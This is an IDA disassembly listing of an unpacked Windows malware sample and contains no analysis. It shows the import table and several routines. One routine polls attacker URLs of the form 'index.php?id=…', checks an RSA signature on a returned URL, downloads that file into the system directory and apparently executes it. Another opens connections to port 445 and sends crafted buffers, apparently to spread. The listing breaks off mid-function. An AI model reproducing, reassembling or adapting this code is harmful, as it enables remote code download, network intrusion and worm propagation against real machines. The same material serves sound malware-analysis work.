;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 39EEEF52A492ECC24C9D72BE36710649
; File Name : u:\work\39eeef52a492ecc24c9d72be36710649_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31600000
; Section 1. (virtual address 00001000)
; Virtual size : 00004000 ( 16384.)
; Section size in file : 00004000 ( 16384.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31601000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31601000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31601004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31601008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3160100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_3160284E+1D�r
dword_31601010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31601014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_3160284E+4E�r ...
dword_31601018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3160101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31601020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31601024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31601028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3160102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31601030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31601034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31601038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_31601040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_31601044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31601048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3160104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31601050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31601054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31601058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3160105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31601060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31601064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31601068 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31602B2C+8F�r
dword_3160106C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_31601070 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_31601074 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_31602A60+F�r
dword_31601078 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_3160107C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_316011A0+F6�r ...
dword_31601080 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_3160219E+57�r
dword_31601084 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_31601422+64�r ...
dword_31601088 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_31602A60+40�r
dword_3160108C dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_31602A60+1B�r
dword_31601090 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_31601094 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_316017DB+16C�r ...
dword_31601098 dd 7C80978Eh ; resolved to->KERNEL32.InterlockedExchangedword_3160109C dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_316010A0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_316010A4 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31601DCA+2C�r
dword_316010A8 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_3160238C+108�r
dword_316010AC dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_316010B0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_316028FA+92�r
dword_316010B4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31602310�r
dword_316010B8 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_316010BC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_316010C0 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_31601F2C+12�r
dword_316010C4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_316010C8 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_316010CC dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_316010D0 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_3160219E+66�r ...
dword_316010D4 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_3160258F+3F�r ...
dword_316010D8 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_316010DC dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_316010E0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_31602A60+C3�r
dword_316010E4 dd 7C910331h, 0 ; resolved to->NTDLL.RtlGetLastWin32Errordword_316010EC dd 77C371BCh ; resolved to->MSVCRT.sranddword_316010F0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_316010F4 dd 77C478A0h ; resolved to->MSVCRT.strlendword_316010F8 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_316010FC dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31601F4D:loc_31601F5E�r ...
dword_31601100 dd 77C35C94h ; resolved to->MSVCRT._except_handler3dword_31601104 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_31602058:loc_31602089�r ...
dword_31601108 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_31601422+AA�r
align 10h
dword_31601110 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31601114 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31601118 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_3160111C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_316015C7+77�r ...
dd 0
dword_31601124 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_316015C7+9D�r
dword_31601128 dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_316015C7+89�r
dword_3160112C dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_31601130 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:3160276E�r
dword_31601134 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_316015C7+B0�r
dd 0
dword_3160113C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31601140 dd 71AB3E00h ; resolved to->WS2_32.binddword_31601144 dd 71AB88D3h ; resolved to->WS2_32.listendword_31601148 dd 71AC1028h ; resolved to->WS2_32.acceptdword_3160114C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31601150 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31601154 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_31601158 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_3160219E+AC�r
dword_3160115C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_316026DE+D�r
dword_31601160 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_3160219E+F0�r
dword_31601164 dd 71AB406Ah ; resolved to->WS2_32.connectdword_31601168 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_31602058+67�r ...
dword_3160116C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_316017DB+1D8�r ...
dword_31601170 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_31602058+128�r
dword_31601174 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_31602058+12F�r
align 10h
dword_31601180 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
dword_31601190 dd 0FFFFFFFFh, 0 dd offset nullsub_2
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_316011A0 proc near ; CODE XREF: sub_31601422+16D�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31601128 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_316011CB
push 1
jmp loc_31601261
; ---------------------------------------------------------------------------
loc_316011CB: ; CODE XREF: sub_316011A0+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_3160108C ; GetSystemDirectoryA
mov edi, dword_31601088
lea eax, [ebp+var_110]
push offset dword_316041F8
push eax
call edi ; lstrcatA
lea eax, [ebp+var_110]
push 6
push eax
call dword_31601084 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_31601F4D
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset dword_316041F0
push eax
call edi ; lstrcatA
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_31601080 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31601241
push 2
jmp short loc_31601261
; ---------------------------------------------------------------------------
loc_31601241: ; CODE XREF: sub_316011A0+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31601124 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_31601264
push [ebp+var_4]
call dword_3160107C ; CloseHandle
push 3
loc_31601261: ; CODE XREF: sub_316011A0+26�j
; sub_316011A0+9F�j
pop eax
jmp short loc_316012B5
; ---------------------------------------------------------------------------
loc_31601264: ; CODE XREF: sub_316011A0+B4�j
mov edi, 100000h
push edi
call sub_31602C6A
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31601134 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_31601078 ; WriteFile
push [ebp+var_4]
call dword_3160107C ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31601F7D
push ebx
call sub_31602C7E
add esp, 0Ch
xor eax, eax
loc_316012B5: ; CODE XREF: sub_316011A0+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_316011A0 endp
; =============== S U B R O U T I N E =======================================
sub_316012BA proc near ; CODE XREF: sub_31601422+F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_316012D1: ; CODE XREF: sub_316012BA+56�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
sub dl, [esp+0Ch+arg_8]
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
sub dl, [esp+0Ch+arg_8]
add eax, 3
shl bl, 4
and bl, 0F0h
or dl, bl
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, 30h
jl short loc_316012D1
pop edi
pop esi
pop ebx
retn
sub_316012BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31601316 proc near ; CODE XREF: sub_3160139B+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31601349
add ebx, 1Ah
loc_31601349: ; CODE XREF: sub_31601316+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31601108
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31601373
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31601396
; ---------------------------------------------------------------------------
loc_31601373: ; CODE XREF: sub_31601316+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31601393
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31601396
; ---------------------------------------------------------------------------
loc_31601393: ; CODE XREF: sub_31601316+68�j
mov al, [ebp+arg_0]
loc_31601396: ; CODE XREF: sub_31601316+5B�j
; sub_31601316+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31601316 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3160139B proc near ; CODE XREF: sub_31601422+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_316013F8
mov edi, [ebp+arg_0]
push ebx
loc_316013B0: ; CODE XREF: sub_3160139B+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_31601316
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_316013DC
cmp bl, 7Ah
jg short loc_316013DC
movsx esi, bl
sub esi, 61h
loc_316013DC: ; CODE XREF: sub_3160139B+34�j
; sub_3160139B+39�j
cmp bl, 41h
jl short loc_316013EC
cmp bl, 5Ah
jg short loc_316013EC
movsx esi, bl
sub esi, 41h
loc_316013EC: ; CODE XREF: sub_3160139B+44�j
; sub_3160139B+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_316013B0
pop ebx
jmp short loc_316013FB
; ---------------------------------------------------------------------------
loc_316013F8: ; CODE XREF: sub_3160139B+F�j
mov edi, [ebp+arg_0]
loc_316013FB: ; CODE XREF: sub_3160139B+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_3160139B endp
; =============== S U B R O U T I N E =======================================
sub_31601402 proc near ; CODE XREF: sub_31601422+104�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_31601406: ; CODE XREF: sub_31601402+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_31601406
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_31601402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31601422 proc near ; CODE XREF: sub_316015C7+B7�p
var_174 = dword ptr -174h
var_170 = byte ptr -170h
var_168 = byte ptr -168h
var_164 = byte ptr -164h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_11C = byte ptr -11Ch
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31601180
push offset sub_31602C90
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 164h
push ebx
push esi
push edi
mov [ebp+var_128], 1
and [ebp+var_4], 0
push offset aZer0 ; "zer0"
push [ebp+arg_0]
call dword_31601104 ; strstr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_130], edi
test edi, edi
jz loc_316015A8
add edi, 4
mov [ebp+var_130], edi
jz loc_316015A8
push edi
call dword_31601084 ; lstrlenA
mov [ebp+var_1C], eax
cmp eax, 50h
jle loc_316015A8
and byte ptr [edi+100h], 0
mov al, [edi]
mov [ebp+var_168], al
movsx ebx, al
sub ebx, 61h
mov [ebp+var_12C], ebx
js loc_316015A8
cmp ebx, 1Ah
jge loc_316015A8
inc edi
mov [ebp+var_130], edi
push 7Eh
push edi
call dword_31601108 ; strchr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_316015A8
mov al, [esi]
mov [ebp+var_170], al
and byte ptr [esi], 0
push ebx
push edi
lea eax, [ebp+var_11C]
push eax
call sub_3160139B
mov al, [ebp+var_170]
mov [esi], al
inc esi
mov [ebp+var_130], esi
xor edi, edi
push edi
lea eax, [ebp+var_164]
push eax
lea eax, [esi+1]
push eax
call sub_316012BA
lea eax, [ebp+var_164]
push eax
call sub_31601402
add esp, 1Ch
cmp [esi], al
jnz short loc_316015A8
push 44h
push offset dword_31604000
lea eax, [ebp+var_124]
push eax
call sub_31601709
add esp, 0Ch
lea eax, [ebp+var_174]
push eax
push 30h
lea eax, [ebp+var_164]
push eax
lea eax, [ebp+var_11C]
push eax
call dword_31601084 ; lstrlenA
push eax
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_124]
push eax
call sub_31601774
add esp, 18h
test eax, eax
jnz short loc_3160159B
cmp [ebp+var_174], edi
jz short loc_3160159B
lea eax, [ebp+var_11C]
push eax
call sub_316011A0
pop ecx
mov [ebp+var_128], edi
loc_3160159B: ; CODE XREF: sub_31601422+15C�j
; sub_31601422+164�j
lea eax, [ebp+var_124]
push eax
call sub_31601758
pop ecx
loc_316015A8: ; CODE XREF: sub_31601422+4E�j
; sub_31601422+5D�j ...
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_128]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31601422 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_316015C7 proc near ; CODE XREF: sub_3160169C+24�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_31602C6A
pop ecx
mov esi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_31601090 ; GetLocaleInfoA
xor ebx, ebx
cmp [ebp+arg_4], bl
jz short loc_3160162F
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_31604FCC
push dword_31604FE4
push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
push eax
call dword_3160111C ; wsprintfA
add esp, 1Ch
jmp short loc_31601647
; ---------------------------------------------------------------------------
loc_3160162F: ; CODE XREF: sub_316015C7+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_3160111C ; wsprintfA
add esp, 0Ch
loc_31601647: ; CODE XREF: sub_316015C7+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31601128 ; InternetOpenA
push ebx
mov edi, eax
push ebx
push ebx
lea eax, [ebp+var_84]
push ebx
push eax
push edi
call dword_31601124 ; InternetOpenUrlA
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 2000h
push esi
push ebx
call dword_31601134 ; InternetReadFile
push esi
call sub_31601422
push esi
call sub_31602C7E
mov esi, dword_3160112C
pop ecx
pop ecx
push ebx
call esi ; InternetCloseHandle
push edi
call esi ; InternetCloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_316015C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_3160169C proc near ; DATA XREF: sub_3160238C+14D�o
push esi
push edi
mov edi, dword_31601098
loc_316016A4: ; CODE XREF: sub_3160169C+6B�j
xor esi, esi
loc_316016A6: ; CODE XREF: sub_3160169C+57�j
inc esi
inc esi
call sub_31602012
test eax, eax
jz short loc_316016C7
mov al, byte_31604080[esi+esi*4]
push eax
push off_31604081[esi+esi*4]
call sub_316015C7
pop ecx
pop ecx
loc_316016C7: ; CODE XREF: sub_3160169C+13�j
call dword_316010FC ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_31602042
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_31601094 ; Sleep
cmp esi, 16h
jb short loc_316016A6
push 0
push offset dword_31604FE4
call edi ; InterlockedExchange
push 0
push offset dword_31604FCC
call edi ; InterlockedExchange
jmp short loc_316016A4
sub_3160169C endp
; =============== S U B R O U T I N E =======================================
sub_31601709 proc near ; CODE XREF: sub_31601422+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_31601034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_31601736
push 8
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_31601736
push 1
pop eax
jmp short loc_31601754
; ---------------------------------------------------------------------------
loc_31601736: ; CODE XREF: sub_31601709+19�j
; sub_31601709+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_31601038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_31601754: ; CODE XREF: sub_31601709+2B�j
pop edi
pop esi
pop ebx
retn
sub_31601709 endp
; =============== S U B R O U T I N E =======================================
sub_31601758 proc near ; CODE XREF: sub_31601422+180�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3160102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_31601030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_31601758 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31601774 proc near ; CODE XREF: sub_31601422+152�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3160101C ; CryptCreateHash
test eax, eax
jnz short loc_3160179A
push 1
pop eax
jmp short loc_316017D7
; ---------------------------------------------------------------------------
loc_3160179A: ; CODE XREF: sub_31601774+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31601020 ; CryptHashData
test eax, eax
jnz short loc_316017B3
push 2
pop edi
jmp short loc_316017CC
; ---------------------------------------------------------------------------
loc_316017B3: ; CODE XREF: sub_31601774+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_31601024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_316017CC: ; CODE XREF: sub_31601774+3D�j
push [ebp+arg_0]
call dword_31601028 ; CryptDestroyHash
mov eax, edi
loc_316017D7: ; CODE XREF: sub_31601774+24�j
pop edi
pop esi
pop ebp
retn
sub_31601774 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_316017DB proc near ; CODE XREF: sub_3160252B+36�p
; sub_3160258F+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31602CB0
mov eax, dword_31604C84
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_31604C88
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_31601158 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31601D3B
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_3160115C ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_3160109C ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_31604C78
push eax
call dword_3160111C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_3160184E: ; CODE XREF: sub_316017DB+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_3160184E
push 60h
lea eax, [ebp+var_E4]
push offset dword_31604798
push eax
call sub_31602CA2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31602C9C ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31602CA2 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31602C9C ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31602CA2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31602C9C ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31602CA2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31602C9C ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31602CA2 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31602C96 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31602C96 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31601160 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31601164 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31601D31
mov esi, dword_31601094
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_31601168
push 89h
push offset dword_31604580
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3160116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31601D26
push 0
push 0A8h
push offset dword_3160460C
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3160116C ; recv
